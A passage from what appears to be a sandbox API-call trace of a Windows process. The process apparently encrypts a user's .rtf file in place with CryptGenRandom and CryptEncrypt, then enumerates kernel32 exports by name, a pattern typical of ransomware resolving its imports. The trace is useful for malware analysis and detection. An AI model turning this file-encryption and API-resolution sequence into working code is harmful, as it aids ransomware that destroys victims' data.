halpmcxz\\documents\\s3f3ughxqbgggruc\\nwlwxgs0t5n.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.745] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=59798) returned 1 [0084.745] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.745] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.745] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.745] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.745] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.746] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.746] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.747] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.747] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.748] CloseHandle (hObject=0x42c) returned 1 [0084.748] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.748] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.749] CloseHandle (hObject=0x0) returned 0 [0084.749] CloseHandle (hObject=0x428) returned 1 [0084.749] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.749] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.749] GetTickCount () returned 0x114da58 [0084.749] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.749] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.749] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.750] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.750] lstrlenA (lpString="kernel32.dll") returned 12 [0084.750] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.750] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.750] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.750] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.750] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.750] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.750] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.750] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.750] lstrlenA (lpString="ADDATOMA") returned 8 [0084.750] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.750] lstrlenA (lpString="ADDATOMW") returned 8 [0084.750] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.750] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.750] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.750] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.751] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.751] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.751] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.751] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.751] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.751] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.751] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.751] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.751] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.751] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.751] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.751] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.751] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.751] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.751] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.751] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.751] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.751] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.752] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.752] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.752] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.752] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.752] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.752] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.752] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.752] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.752] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.752] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.752] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.752] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.752] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.752] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.752] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.752] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.752] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.752] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.752] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.753] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.753] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.753] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.753] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.753] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.753] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.753] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.753] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.753] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.753] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.753] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.753] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.753] lstrlenA (lpString="BEEP") returned 4 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.753] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.753] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.753] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.753] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.753] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.753] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.754] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.754] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.754] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.754] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.754] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.754] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.754] lstrlenA (lpString="CANCELIO") returned 8 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.754] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.754] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.754] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.754] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.754] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.754] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.754] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.754] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.754] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.754] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.754] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.754] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.755] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.755] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.755] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.755] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.755] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.755] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.755] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.755] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.755] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.755] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.755] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.755] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.755] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.755] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.755] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.755] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.755] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.755] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.755] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.756] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.756] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.756] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.756] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.756] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.756] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.756] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.756] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.756] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.756] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.756] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, 